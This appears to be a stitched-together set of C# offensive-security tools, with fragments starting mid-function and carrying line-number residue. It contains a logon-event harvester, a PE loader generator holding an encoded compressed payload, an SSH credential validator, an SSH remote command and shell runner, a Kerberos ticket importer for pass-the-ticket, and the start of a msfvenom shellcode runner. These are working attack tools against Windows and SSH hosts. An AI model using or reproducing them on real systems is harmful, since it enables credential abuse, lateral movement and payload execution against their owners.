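                if (length1 < 0 || length2 < 0 || length3 < 0 || length4 < 0)
                    continue;
                String targetUserSid = Message.Substring(pos1 + 14, length1);
                String targetDomainName = Message.Substring(pos3 + 17, length2);
                String targetUserName = Message.Substring(pos2 + 15, length3);
                String ipAddress = Message.Substring(pos5 + 24, length4);
                if (targetUserSid.Length > 9 && ipAddress.Length > 8)
                {
                    Console.WriteLine("[+] EventRecordID: " + o.GetPropertyValue("RecordNumber"));
                    Console.WriteLine(" TimeCreated : " + o.GetPropertyValue("TimeGenerated"));
                    Console.WriteLine(" UserSid: " + targetUserSid);
                    Console.WriteLine(" DomainName: " + targetDomainName);
                    Console.WriteLine(" UserName: " + targetUserName);
                    Console.WriteLine(" IpAddress: " + ipAddress);
                    flagExist++;
                }
            }
        }
        Console.WriteLine("Total: " + flagTotal + ", Exist: " + flagExist);
    }
    catch (Exception e)
    {
        Console.WriteLine("[!] ERROR: {0}", e);
    }
}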
59 | "; 60 | if(args.Length !=1) 61 | { 62 | Console.WriteLine(Usage); 63 | Environment.Exit(0); 64 | } 65 | 66 | PELoader pe = new PELoader(args[0].ToString()); 67 | if (pe.Is32BitHeader) 68 | { 69 | Console.WriteLine("[+] 32 bit of PE"); 70 | Console.WriteLine("[*] Try to generate SharpPELoader_x86.cs"); 71 | string source1compress_x86 = @"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"; 72 | byte[] data1 = System.Convert.FromBase64String(source1compress_x86); 73 | byte[] decompressed1 = Decompress(data1); 74 | string source1_x86 = System.Text.Encoding.Default.GetString(decompressed1); 75 | 76 | byte[] AsBytes1 = File.ReadAllBytes(args[0].ToString()); 77 | byte[] compress1 = Compress(AsBytes1); 78 | string source2_x86 = Convert.ToBase64String(compress1); 79 | 80 | string 
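/// <summary>
/// Reads the DOS header and the COFF file header of a PE image from disk so that callers can
/// inspect <see cref="FileHeader"/> and <see cref="Is32BitHeader"/>.
/// </summary>
public class PELoader
{
    public struct IMAGE_DOS_HEADER
    {      // DOS .EXE header
        public UInt16 e_magic;              // Magic number
        public UInt16 e_cblp;               // Bytes on last page of file
        public UInt16 e_cp;                 // Pages in file
        public UInt16 e_crlc;               // Relocations
        public UInt16 e_cparhdr;            // Size of header in paragraphs
        public UInt16 e_minalloc;           // Minimum extra paragraphs needed
        public UInt16 e_maxalloc;           // Maximum extra paragraphs needed
        public UInt16 e_ss;                 // Initial (relative) SS value
        public UInt16 e_sp;                 // Initial SP value
        public UInt16 e_csum;               // Checksum
        public UInt16 e_ip;                 // Initial IP value
        public UInt16 e_cs;                 // Initial (relative) CS value
        public UInt16 e_lfarlc;             // File address of relocation table
        public UInt16 e_ovno;               // Overlay number
        public UInt16 e_res_0;              // Reserved words
        public UInt16 e_res_1;              // Reserved words
        public UInt16 e_res_2;              // Reserved words
        public UInt16 e_res_3;              // Reserved words
        public UInt16 e_oemid;              // OEM identifier (for e_oeminfo)
        public UInt16 e_oeminfo;            // OEM information; e_oemid specific
        public UInt16 e_res2_0;             // Reserved words
        public UInt16 e_res2_1;             // Reserved words
        public UInt16 e_res2_2;             // Reserved words
        public UInt16 e_res2_3;             // Reserved words
        public UInt16 e_res2_4;             // Reserved words
        public UInt16 e_res2_5;             // Reserved words
        public UInt16 e_res2_6;             // Reserved words
        public UInt16 e_res2_7;             // Reserved words
        public UInt16 e_res2_8;             // Reserved words
        public UInt16 e_res2_9;             // Reserved words
        public UInt32 e_lfanew;             // File address of new exe header
    }

    [StructLayout(LayoutKind.Sequential, Pack = 1)]
    public struct IMAGE_FILE_HEADER
    {
        public UInt16 Machine;
        public UInt16 NumberOfSections;
        public UInt32 TimeDateStamp;
        public UInt32 PointerToSymbolTable;
        public UInt32 NumberOfSymbols;
        public UInt16 SizeOfOptionalHeader;
        public UInt16 Characteristics;
    }

    // "MZ" and "PE\0\0" as little-endian integers.
    private const UInt16 DosSignature = 0x5A4D;
    private const UInt32 NtSignature = 0x00004550;

    /// <summary>
    /// The DOS header
    /// </summary>
    private IMAGE_DOS_HEADER dosHeader;
    /// <summary>
    /// The file header
    /// </summary>
    private IMAGE_FILE_HEADER fileHeader;

    /// <summary>
    /// Opens <paramref name="filePath"/> read-only and parses its DOS and file headers.
    /// Any failure (unreadable file, truncated header, wrong signature) is printed and the
    /// process exits with code 0, as the original constructor did for I/O errors.
    /// </summary>
    /// <param name="filePath">Path of the DLL or EXE to inspect.</param>
    public PELoader(string filePath)
    {
        try
        {
            using (FileStream stream = new FileStream(filePath, System.IO.FileMode.Open, System.IO.FileAccess.Read))
            using (BinaryReader reader = new BinaryReader(stream))
            {
                dosHeader = FromBinaryReader<IMAGE_DOS_HEADER>(reader);
                // The file is arbitrary input: check both signatures before trusting
                // e_lfanew or the fields that follow it.
                if (dosHeader.e_magic != DosSignature)
                    throw new InvalidDataException("Not a PE file: missing MZ signature.");
                stream.Seek(dosHeader.e_lfanew, SeekOrigin.Begin);

                UInt32 ntHeadersSignature = reader.ReadUInt32();
                if (ntHeadersSignature != NtSignature)
                    throw new InvalidDataException("Not a PE file: missing PE signature.");
                fileHeader = FromBinaryReader<IMAGE_FILE_HEADER>(reader);
            }
        }
        catch (Exception e)
        {
            Console.WriteLine("[!] {0}", e.Message);
            Environment.Exit(0);
        }
    }

    /// <summary>
    /// Reads Marshal.SizeOf(typeof(T)) bytes from <paramref name="reader"/> and marshals them
    /// into a structure of type <typeparamref name="T"/>.
    /// </summary>
    /// <typeparam name="T">Blittable structure type to read.</typeparam>
    /// <param name="reader">Reader positioned at the first byte of the structure.</param>
    /// <returns>The populated structure.</returns>
    /// <exception cref="EndOfStreamException">Fewer bytes remain than the structure needs.</exception>
    public static T FromBinaryReader<T>(BinaryReader reader)
    {
        int size = Marshal.SizeOf(typeof(T));
        byte[] bytes = reader.ReadBytes(size);
        // ReadBytes returns a shorter array at end of stream; marshalling from it would read
        // past the end of the pinned buffer.
        if (bytes.Length != size)
            throw new EndOfStreamException("Truncated header: expected " + size + " bytes, got " + bytes.Length + ".");

        // Pin the managed buffer while the structure is copied out, then always unpin it.
        GCHandle handle = GCHandle.Alloc(bytes, GCHandleType.Pinned);
        try
        {
            return (T)Marshal.PtrToStructure(handle.AddrOfPinnedObject(), typeof(T));
        }
        finally
        {
            handle.Free();
        }
    }

    /// <summary>
    /// True when the IMAGE_FILE_32BIT_MACHINE bit (0x0100) is set in Characteristics.
    /// The Machine field is not consulted.
    /// </summary>
    public bool Is32BitHeader
    {
        get
        {
            const UInt16 IMAGE_FILE_32BIT_MACHINE = 0x0100;
            return (IMAGE_FILE_32BIT_MACHINE & FileHeader.Characteristics) == IMAGE_FILE_32BIT_MACHINE;
        }
    }

    /// <summary>The parsed COFF file header.</summary>
    public IMAGE_FILE_HEADER FileHeader
    {
        get
        {
            return fileHeader;
        }
    }

}//End Class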
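/// <summary>
/// Entry point. Attempts one SSH login with either a password or a private key file and
/// reports whether the credential was accepted.
/// </summary>
/// <param name="args">
/// args[0] host, args[1] port, args[2] "plaintext" or "keyfile", args[3] user name,
/// args[4] password or key file path.
/// </param>
static void Main(string[] args)
{
    if (args.Length != 5)
    {
        ShowUsage();
        return;
    }

    try
    {
        String Host = args[0];
        String Port = args[1];
        String Username = args[3];
        if (args[2] == "plaintext")
        {
            String Password = args[4];
            var connectionInfo = new PasswordConnectionInfo(Host, Int32.Parse(Port), Username, Password);
            connectionInfo.Timeout = TimeSpan.FromSeconds(10);
            // using: the client is released even when Connect() throws on a rejected login.
            using (var ssh = new SshClient(connectionInfo))
            {
                ssh.Connect();
                Console.WriteLine("[+] Valid: " + Username + " " + Password);
                ssh.Disconnect();
            }
        }
        else if (args[2] == "keyfile")
        {
            String Keypath = args[4];
            // using: the key file handle is closed on every path, including failures.
            using (FileStream keyFileStream = File.OpenRead(Keypath))
            {
                byte[] byData = new byte[40];
                // Only decode the bytes actually read; a key file may be shorter than 40 bytes.
                int read = keyFileStream.Read(byData, 0, byData.Length);
                string keyData = System.Text.Encoding.Default.GetString(byData, 0, read);
                if (keyData.Contains("OPENSSH"))
                {
                    Console.WriteLine("[!] Bad format of key file. You should use puttygen to convert the format.");
                    System.Environment.Exit(0);
                }

                keyFileStream.Seek(0, SeekOrigin.Begin);
                var connectionInfo = new PrivateKeyConnectionInfo(Host, Int32.Parse(Port), Username, new PrivateKeyFile(keyFileStream));
                connectionInfo.Timeout = TimeSpan.FromSeconds(10);

                using (var ssh = new SshClient(connectionInfo))
                {
                    ssh.Connect();
                    Console.WriteLine("[+] Valid: " + Username + " " + Keypath);
                    ssh.Disconnect();
                }
            }
        }
        else
        {
            Console.WriteLine("[!] Wrong parameter");
            System.Environment.Exit(0);
        }
    }
    catch (Renci.SshNet.Common.SshException ex)
    {
        Console.WriteLine("[!] " + ex.Message);
    }
    catch (Exception exception)
    {
        Console.WriteLine("[!] " + exception.Message);
    }
}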
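/// <summary>
/// Runs <paramref name="cmd"/> on an already connected client and writes its output.
/// When <paramref name="cmd"/> is "shell", reads commands from standard input until "exit"
/// or end of input.
/// </summary>
private static void RunCommands(SshClient ssh, String cmd)
{
    if (cmd != "shell")
    {
        using (var runcmd = ssh.CreateCommand(cmd))
        {
            Console.Write(runcmd.Execute());
        }
        return;
    }

    while (true)
    {
        Console.Write("\n#");
        String line = Console.ReadLine();
        // ReadLine returns null when standard input is closed; treat that like "exit".
        if (line == null || line == "exit")
        {
            Console.Write("[*] Exit.");
            return;
        }
        using (var runcmd = ssh.CreateCommand(line))
        {
            Console.Write(runcmd.Execute());
        }
    }
}

/// <summary>
/// Entry point. Logs in over SSH with a password or a private key file and runs one command,
/// or an interactive command loop when the command is "shell".
/// </summary>
/// <param name="args">
/// args[0] host, args[1] port, args[2] "plaintext" or "keyfile", args[3] user name,
/// args[4] password or key file path, args[5] command or "shell".
/// </param>
static void Main(string[] args)
{
    if (args.Length != 6)
    {
        ShowUsage();
        return;
    }

    try
    {
        String Host = args[0];
        String Port = args[1];
        String Username = args[3];
        String cmd = args[5];
        if (args[2] == "plaintext")
        {
            String Password = args[4];
            var connectionInfo = new PasswordConnectionInfo(Host, Int32.Parse(Port), Username, Password);
            connectionInfo.Timeout = TimeSpan.FromSeconds(10);
            // using: the session is released even when Connect() or a command throws.
            using (var ssh = new SshClient(connectionInfo))
            {
                ssh.Connect();
                Console.WriteLine("[+] Valid: " + Username + " " + Password);
                RunCommands(ssh, cmd);
                ssh.Disconnect();
            }
        }
        else if (args[2] == "keyfile")
        {
            String Keypath = args[4];
            // using: the key file handle is closed on every path, including failures.
            using (FileStream keyFileStream = File.OpenRead(Keypath))
            {
                byte[] byData = new byte[40];
                // Only decode the bytes actually read; a key file may be shorter than 40 bytes.
                int read = keyFileStream.Read(byData, 0, byData.Length);
                string keyData = System.Text.Encoding.Default.GetString(byData, 0, read);
                if (keyData.Contains("OPENSSH"))
                {
                    Console.WriteLine("[!] Bad format of key file. You should use puttygen to convert the format.");
                    System.Environment.Exit(0);
                }

                keyFileStream.Seek(0, SeekOrigin.Begin);
                var connectionInfo = new PrivateKeyConnectionInfo(Host, Int32.Parse(Port), Username, new PrivateKeyFile(keyFileStream));
                connectionInfo.Timeout = TimeSpan.FromSeconds(10);

                using (var ssh = new SshClient(connectionInfo))
                {
                    ssh.Connect();
                    Console.WriteLine("[+] Valid: " + Username + " " + Keypath);
                    RunCommands(ssh, cmd);
                    ssh.Disconnect();
                }
            }
        }
        else
        {
            Console.WriteLine("[!] Wrong parameter");
            System.Environment.Exit(0);
        }
    }
    catch (Renci.SshNet.Common.SshException ex)
    {
        Console.WriteLine("[!] " + ex.Message);
    }
    catch (Exception exception)
    {
        Console.WriteLine("[!] " + exception.Message);
    }
}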
public KERB_PROTOCOL_MESSAGE_TYPE MessageType; 47 | public LUID LogonId; 48 | public int Flags; 49 | public KERB_CRYPTO_KEY32 Key; // key to decrypt KERB_CRED 50 | public int KerbCredSize; 51 | public int KerbCredOffset; 52 | } 53 | public static void ImportTGT(byte[] ticket) 54 | { 55 | IntPtr LsaHandle = IntPtr.Zero; 56 | int AuthenticationPackage; 57 | int ntstatus, ProtocalStatus; 58 | 59 | ntstatus = LsaConnectUntrusted(out LsaHandle); 60 | if (ntstatus != 0) 61 | throw new Win32Exception(LsaNtStatusToWinError(ntstatus)); 62 | IntPtr inputBuffer = IntPtr.Zero; 63 | IntPtr ProtocolReturnBuffer; 64 | int ReturnBufferLength; 65 | try 66 | { 67 | LSA_STRING LSAString; 68 | string Name = "kerberos"; 69 | LSAString.Length = (ushort)Name.Length; 70 | LSAString.MaximumLength = (ushort)(Name.Length + 1); 71 | LSAString.Buffer = Name; 72 | ntstatus = LsaLookupAuthenticationPackage(LsaHandle, ref LSAString, out AuthenticationPackage); 73 | if (ntstatus != 0) 74 | throw new Win32Exception(LsaNtStatusToWinError(ntstatus)); 75 | KERB_SUBMIT_TKT_REQUEST request = new KERB_SUBMIT_TKT_REQUEST(); 76 | request.MessageType = KERB_PROTOCOL_MESSAGE_TYPE.KerbSubmitTicketMessage; 77 | request.KerbCredSize = ticket.Length; 78 | request.KerbCredOffset = Marshal.SizeOf(typeof(KERB_SUBMIT_TKT_REQUEST)); 79 | 80 | int inputBufferSize = Marshal.SizeOf(typeof(KERB_SUBMIT_TKT_REQUEST)) + ticket.Length; 81 | inputBuffer = Marshal.AllocHGlobal(inputBufferSize); 82 | Marshal.StructureToPtr(request, inputBuffer, false); 83 | Marshal.Copy(ticket, 0, new IntPtr(inputBuffer.ToInt64() + request.KerbCredOffset), ticket.Length); 84 | ntstatus = LsaCallAuthenticationPackage(LsaHandle, AuthenticationPackage, inputBuffer, inputBufferSize, out ProtocolReturnBuffer, out ReturnBufferLength, out ProtocalStatus); 85 | if (ntstatus != 0) 86 | throw new Win32Exception(LsaNtStatusToWinError(ntstatus)); 87 | if (ProtocalStatus != 0) 88 | throw new Win32Exception(LsaNtStatusToWinError(ProtocalStatus)); 89 | } 90 | 
finally 91 | { 92 | if (inputBuffer != IntPtr.Zero) 93 | Marshal.FreeHGlobal(inputBuffer); 94 | LsaDeregisterLogonProcess(LsaHandle); 95 | } 96 | } 97 | 98 | public static void ShowUsage() 99 | { 100 | string Usage = @" 101 | Use to import the TGT 102 | Reference:https://github.com/vletoux/MakeMeEnterpriseAdmin 103 | Usage: 104 | 105 | eg. 106 | SharpTGTImporter.exe 1.kirbi 107 | 108 | Complie: 109 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SharpTGTImporter.cs 110 | or 111 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpTGTImporter.cs 112 | "; 113 | Console.WriteLine(Usage); 114 | } 115 | 116 | static void Main(string[] args) 117 | { 118 | if (args.Length != 1) 119 | { 120 | ShowUsage(); 121 | System.Environment.Exit(0); 122 | } 123 | try 124 | { 125 | TGTImporter importer1 = new TGTImporter(); 126 | byte[] ticket = File.ReadAllBytes(args[0]); 127 | ImportTGT(ticket); 128 | } 129 | catch (Exception e) 130 | { 131 | Console.WriteLine("[!] ERROR: {0}", e.Message); 132 | } 133 | } 134 | } 135 | } 136 | -------------------------------------------------------------------------------- /Shellcode.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | namespace RunShellcode 4 | { 5 | class Program 6 | { 7 | static void Main(string[] args) 8 | { 9 | //msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f csharp 10 | byte[] shellcode64 = new byte[276] { 11 | 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52, 12 | 0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48, 13 | 0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9, 14 | 0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41, 15 | 0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48, 16 | 